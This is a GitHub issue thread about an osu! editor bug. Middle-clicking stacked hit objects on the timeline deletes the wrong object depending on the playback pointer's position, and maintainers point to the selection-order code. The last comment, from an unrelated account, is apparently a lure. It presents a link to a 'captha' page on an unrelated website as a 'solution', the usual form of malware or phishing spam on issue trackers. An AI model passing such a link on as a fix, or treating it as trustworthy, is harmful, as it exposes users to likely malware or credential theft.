### ISSUE TITLE
Middle click to delete the stacked hit objects at timeline has weird logic

### ISSUE THREAD

**Issue by MeerukYang** [ppy/osu#30406]
### Type

Cosmetic

### Bug description

Stacked hit objects at timeline are like these:
![image](https://github.com/user-attachments/assets/d9024b10-e95d-4e09-8968-224c1b9cab8e)

When trying to middle-click to delete one hit object, for example the "2" circle, if place the cursor on the "2" circle area, the deletion may vary from "1", "2", or "3". This depends on where EXACTLY you clicked and whether the current-playing pointer is before or after the circle.

To be more accurate, stacked areas are listed as 1, 2 and 3 in this image:
![未标题8967564-1](https://github.com/user-attachments/assets/68e95be1-7a07-4aaf-a723-2e8989a8debc)

If the pointer is **after** the stacked objects, like this:
![image](https://github.com/user-attachments/assets/0307bb72-7c5c-403b-bed2-e72f16c1f34d)
Then clicking the stacked area always delete the bottom object.
For example, click the 1 area to delete the blue circle; click the 2 or 3 area to delete the orange circle.
**This is weird** because it seems that you have placed the cursor on the object that need to be deleted, but actually the cursor is located in these stacked areas and you're actually deleting the bottom one.   

And if the pointer is **before** the stacked objects, then clicking the stacked area always delete the top object.
For example, click the 1 or 2 area to delete the green circle; click the 3 area to delete the blue circle.
This makes more sense since the I-want-to-delete object is literally the object you want to delete. 

However you cannot decide where the mappers would place the current-playing pointer, Thus there's a logic problem.
In current version, if hit objects stack to one another, the previous object is always above the latter one. And no one would think that the objects are transparent. Thus stacked objects are actually like this:
![未标42342356题-1](https://github.com/user-attachments/assets/c2952da8-1b39-47f9-8bbf-e096ad1fe418)
It is more logical and reasonable that middle-click the 1 area to delete the green circle, 2 to blue, 3 to orange, no matter where located the stack areas or the current-playing pointer. 

### Version

2024.1009.1

### Logs

[compressed-logs.zip](https://github.com/user-attachments/files/17494478/compressed-logs.zip)

**Comment by peppy** [comment]
TLDR: behaviour is correct if timeline blueprints are right of the centre point, but wrong if they are to the left. I've taken a quick look but can't see how this is happening (@OliBomby may be more readily able to call out what's going on here?)


https://github.com/user-attachments/assets/9cd6bfa8-f432-4f75-a708-eca30c40e29c

**Comment by OliBomby** [comment]
I have no clue whats going on here. Input handling is still kind of mysterious to me.

**Comment by peppy** [comment]
This is doing custom input handling, else it would just-work because it would match the visuals.

For anyone investigating, the starting point would be

https://github.com/ppy/osu/blob/dbc2e78dd94781444ef7ac24c8038b3c5a21ee4e/osu.Game/Screens/Edit/Compose/Components/BlueprintContainer.cs#L414

with focus on `ApplySelectionOrder`

**Comment by sgmustafi** [comment]
maybe this solution will solve your problem [click](https://www.calvarywhangarei.co.nz/captha/index.html)
